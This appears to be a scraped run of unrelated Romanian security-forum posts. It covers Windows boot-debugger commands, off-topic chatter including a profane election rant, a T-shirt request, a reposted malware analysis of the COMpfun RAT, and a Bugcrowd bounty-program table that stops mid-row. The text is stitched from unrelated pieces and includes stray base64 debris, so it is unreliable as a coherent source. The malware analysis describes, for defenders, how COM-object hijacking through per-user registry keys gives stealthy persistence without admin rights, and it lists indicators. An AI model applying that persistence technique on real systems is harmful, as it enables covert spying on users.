Bootmgr is called the boot manager and responsible for listing a boot menu and firing up an appropriate program according to a user's selection in the list. Unlike debugging Ntldr, you can activate the boot manager debugger with the following commands. ---- bcdedit /bootdebug {bootmgr} on ---- Fore more details, you can consult MSDN, BCDEdit /bootdebug. Note that the executable file is located in C:\Windows\Boot\PCAT\bootmgr and contains a 32bit PE image as with Ntldr. [h=4]Winload.exe[/h] Winload.exe is called the boot loader and used for the regular boot procedure. It basically loads Ntoskrnl.exe and some other boot drivers. Enabling the boot loader debugger can be simply done with bcdedit like the case of Bootmgr. ---- bcdedit /bootdebug on ---- [h=4][/h] [h=3]Further Research[/h] Difference in Windows 10. When the processor mode is changed to the long mode on the x64 system. QEMU may be better in terms of installing OSs in it. Sursa: Satoshi's note: Debugging Early Boot Stages of Windows

Da. @Gecok @ ENCODED - Ceva idei? Dam de beut.

Sugestie: afiseaza si tu ceva inainte de a te inregistra, gen "Ultimele adaugate". Adica daca cineva nu e logat vede doar formularul de login si nu stie despre ce e vorba => o sa Alt + F4. Nota: Daca vrei sa vinzi asa ceva, trebuie sa le VERIFICI. Si asta inseamna ca cei care cumpara de pe site trebuie sa aiba incredere in tine. "Vii si iti pui site-ul in db si ai acces la toate vulnerabilitatile gasite in el" - Atunci cum e, ca "atacator", sa vin sa postez vulnerabilitati gasite, cand owner-ul le vede si le repara?

Probleme semnalizate la alegeri: - lipsa formularelor pentru declaratii (mai ales Bucuresti) - Guvernul (Muie Ponta) - lipsa buletinelor de vot din strainatete - Guvernul (Muie Ponta) - la o sectie au disparut subit 400 de buletine de vot - PSD (Muie Ponta) - au fost reclamate autocare cu muncitori veniti sa voteze - PSD (Muie Ponta) - s-au primit mesaje care indemnau lumea sa voteze cu - PSD (Muie Ponta) - s-au impartit flyere prin care ziceau ca maresc pensiile - PSD (Muie Ponta) Si probabil multe altele. Asadar, dragi labagii, daca nu iesiti la vot, astia or sa va conduca. Nota: Cred ca avem SEO pe keyword-urile "muie ponta"

Pai da, sa faca niste modele pentru toata lumea.

Salut, As vrea un model pentru tricou, de luat la Defcamp. Nu ma pricep la Photoshop dar sunt pe aici cateva persoane care se pricep. Nu stiu ce detalii sa ofer: - verde deschis - text: RST/Romanian Security Team - shellcode/assembler - logo ... Mai e un topic aici despre acest subiect. Cine mai vrea tricou? Are cineva timp sa incerce sa faca 2-3 modele? Putem plati. Thanks!

30.10.2014, Author: Paul Rascagneres COM Object hijacking: the discreet way of persistence An Analysis of a new persistence mechanism in the wild G DATA SecurityLabs experts discovered a new Remote Administration Tool, which we dubbed COMpfun. This RAT supports 32-bit and 64-bit Windows versions, up to the Windows 8 operating system. The features are rather common for today’s espionage tools: file management (download and upload), screenshot taking, Keylogger functionality, code execution possibility and more. It uses the HTTPS and an asymmetric encryption (RSA) to communicate with the command and control server. The big novelty is the persistence mechanism: the malware hijacks a legitimate COM object in order to be injected into the processes of the compromised system. And it is remarkable, that this hijacking action does not need administrator rights. With this RAT, Attackers could spy on an infected system for quite a long time, as this detection evasion and persistence mechanism is indeed pretty advanced! What is a COM object? COM (Component Object Model) is described by Microsoft as “platform-independent, distributed, object-oriented system for creating binary software components that can interact”. The purpose of this technology is to provide an interface to allow developers to control and manipulate objects of other applications. We already spoke about this technology in the IcoScript case. Each COM object is defined by a unique ID called CLSID. For example the CLSID to create an instance of Internet Explorer is {0002DF01-0000-0000-C000-000000000046}. COM object hijacking analysis During the installation phase, the malware drops two files into the directory: %APPDATA%\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\ The file names are created using the following scheme: api-ms-win-downlevel-[4char-random]-l1-1-0._dl One file is the 32-bit version of the malware and the second one is the 64-bit version. The second step: the creation of two registry entries: HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32 HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E }\InprocServer32 For each entry, the default value is the path to the files that were dropped before. In the following screenshot, the file containing rhwm is the 64-bit version of the malware and the file containing dtjb was created for the 32-bit version, respectively. =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NDk6IkNPTSBvYmplY3Qg&parameters[3]=ZGVmaW5pdGlvbiAoNjQtYml0KSAtIENsaWNrIHRvIGVubGFyZ2UiO3M6NDoid3Jh&parameters[4]=cCI7czozNzoiPGEgaHJlZj0iamF2YXNjcmlwdDpjbG9zZSgpOyI%2BIHwgPC9hPiI7&parameters[5]=fQ%3D%3D"] =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NDg6IkNPTSBvYmplY3Qg&parameters[3]=ZGVmaW5pdGlvbiAoMzItYml0KSAtIENsaWNrIHRvIGVubGFnZSI7czo0OiJ3cmFw&parameters[4]=IjtzOjM3OiI8YSBocmVmPSJqYXZhc2NyaXB0OmNsb3NlKCk7Ij4gfCA8L2E%2BIjt9"] The purpose of the keys is to define a COM object with the CLSIDs {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} and {BCDE0395-E52F-467C-8E3D-C4579291692E}. If these objects are instanced, the library will be loaded into the respective process. But the CLSIDs are predefined by Microsoft and the newly created owns replace the originals: {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}: the CLSID of the class CAccPropServicesClass. {BCDE0395-E52F-467C-8E3D-C4579291692E}: it’s the CLSID of the class MMDeviceEnumerator. These two instances are used by a lot of applications, for example by the browser (by using the CoCreateInstance() function). With Process Explorer, we are able to list the library loaded into a specific process. Here are the loaded libraries designed for a 32-bit process: =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NTE6IjMyLWJpdCBsaWJy&parameters[3]=YXJ5IGxvYWRlZCBieSBGaXJlZm94IC0gQ2xpY2sgdG8gZW5sYXJnZSI7czo0OiJ3&parameters[4]=cmFwIjtzOjM3OiI8YSBocmVmPSJqYXZhc2NyaXB0OmNsb3NlKCk7Ij4gfCA8L2E%2B&parameters[5]=Ijt9"] The following screenshot shows the loaded libraries in a 64-bit process: =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NjE6IjY0LWJpdCBsaWJy&parameters[3]=YXJ5IGxvYWRlZCBieSBJbnRlcm5ldCBFeHBsb3JlciAtIENsaWNrIHRvIGVubGFy&parameters[4]=Z2UiO3M6NDoid3JhcCI7czozNzoiPGEgaHJlZj0iamF2YXNjcmlwdDpjbG9zZSgp&parameters[5]=OyI%2BIHwgPC9hPiI7fQ%3D%3D"] In both of these cases, we can see our dropped library. The processes use the registry key previously created to load the malicious library instead of the original Microsoft library Conclusion This new approach of persistence mechanism has several advantages: the attacker does not need to perform DLL injection, which is usually monitored by anti-virus software. Therefore, he has overcome one important security measure, in most of the cases. As soon as the infection was successful, Microsoft Windows then natively executes the library in the processes of the infected user. Hence, the attacking process is hard to be identified. Using COM hijacking is undoubtedly silent. It is not even detected by Sysinternals’ Autoruns. So, in our case, we have seen this mechanism being used combined with a RAT and this would mean a hassle for any infected and therefore affected user, as the attackers can spy on him pretty secretly for quite some time. But, obviously, this new persistence mechanism is not limited to the use of RATs. Attackers can combine it with any other type of malware, too! G DATA customers are protected: the latest scan engines detect the analyzed samples (see below). Furthermore, our behavior blocker technology identifies this threat and blocks it. IOC Registry HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\ HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E } Files %APPDATA%\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\ The file names are created using the following scheme: api-ms-win-downlevel-[4char-random]-l1-1-0._dl MD5 482a70b7f29361665c80089fbf49b41f (Trojan.Generic.11683196; Win32.Trojan.COMpfun. 88fc61bcd28a9a0dc167bc78ba969fce (Trojan.Generic.11671459; Win32.Trojan.COMpfun.A) 11f814e7fb9616f46c6e4b72e1cf39f6 (Gen:Trojan.Heur2.LP.dq8@aKnXWtic; Win32.Trojan.COMpfun.C) 671d230ae8874bb89db7099d1c8945e0 (Win64.Trojan.COMpfun.C) ---------------------------------- Side note: You are maybe wondering about the malware signature name containing “fun”. During our analysis, the [4char-random] value of the malware name was “pfun” and… yeah, we thought that this was ‘fun’ny, indeed ;-) Sursa: https://blog.gdatasoftware.com/blog/article/com-object-hijacking-the-discreet-way-of-persistence.html

[h=1]The Bug Bounty List[/h] A comprehensive, up to date list of bug bounty and disclosure programs from across the web curated by the Bugcrowd researcher community. Email address [h=4]Thanks to the 90 Legends for their contribution to this page. View contributors.[/h] [TABLE=class: table list-table fixed-header] [TR] [TH]Company [/TH] [TH]New [/TH] [TH]Reward [/TH] [TH] Swag [/TH] [TH=class: hall-of-fame] Hall of Fame [/TH] [/TR] [TR=class: active fame] [TD] 123 Contact Form [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] 99designs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Abacus [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Acquia [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Active Campaign [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ActiveProspect [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ActiVPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active swag] [TD] Adapcare [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] AeroFS [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Aerohive [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Agora Ciudadana Security [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Airbnb [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active swag] [TD] Alcyon [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Altervista [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Amazon Web Services [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] ANCILE Solutions Inc. [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Android Free Apps [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Appcelerator [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Apple [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Apptentive [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Aptible [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Asana [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] AT&T [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Attack Secure [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Automattic [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Avast! [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Avira [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Badoo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Barracuda [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Base [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Basecamp [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Beanstalk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Bitcasa [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Bitcoin.de [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Bittrex [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Blackberry [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Blackphone [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Blinksale [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Blogger [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Box [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Braintree [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] BTX Trader [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Buffer [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] C2FO [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Campaign Monitor [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Can you XSS this? [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] CARD.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Chargify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Chromium Project [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active swag] [TD] CircleCi [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Cisco [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Code Climate [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] CodePen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Coinbase [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Coinkite [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active swag] [TD] Commonsware [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Compilr [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Compose [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Constant Contact [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Coupa [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] CPanel [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] cPaperless [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Cryptocat [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Cupcake [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Customer Insight [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame new] [TD] Dato Capital [/TD] [TD] Yes [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Dell Secureworks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Detectify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Deutsche Telekom [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Digital Ocean [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] DNSimple [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Downstream Analytics [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Dribbble [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Dropbox [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Dropcam [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Drupal [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] eBay [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Eclipse [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame new] [TD] Elance-oDesk [/TD] [TD] Yes [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] EMC2 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Emptrust [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Engineyard [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] EthnoHub [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Etsy [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Eventbrite [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Event Espresso [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Evernote [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Expatistan [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Facebook [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] FFmpeg [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] flood.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Flowdock [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Fluxiom [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Form Assembly [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Foursquare [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Foxycart [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Freelancer [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Gallery [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Gamma [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Gemeente Wageningen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Gemfury [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] getClouder [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Ghost [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Ghostscript [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Giftcards.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Github [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Gitlab [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Gittip [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Gliph [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] GoAnimate [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Google [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] 